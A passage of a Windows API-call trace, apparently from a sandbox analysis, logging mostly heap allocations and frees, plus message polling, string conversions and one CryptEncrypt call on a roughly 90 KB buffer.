Size=0x10) returned 0x2e51478 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0238.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0238.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0238.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0238.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0238.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0238.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0238.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0238.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0238.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0238.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0238.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0238.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0238.945] CharLowerBuffW (in: lpsz="byte[89928]", cchLength=0xb | out: lpsz="byte[89928]") returned 0xb [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0238.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0238.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0238.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0238.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0238.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0238.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0238.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0238.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0238.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0238.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0238.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0238.993] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.993] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0238.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0238.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0238.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51478 [0238.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51478, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0238.995] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e96280*, pdwDataLen=0x8cef60*=0x15f46, dwBufLen=0x15f48 | out: pbData=0x2e96280*, pdwDataLen=0x8cef60*=0x15f48) returned 1 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0238.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0238.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0238.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0238.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0238.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0238.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0238.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0238.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0238.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0238.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0239.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0239.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0239.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0239.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0239.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0239.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0239.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0239.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0239.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0239.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0239.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0239.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0239.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0239.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0239.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0239.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0239.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0239.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0239.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0239.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0239.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0239.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0239.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55218 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0239.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0239.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0239.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 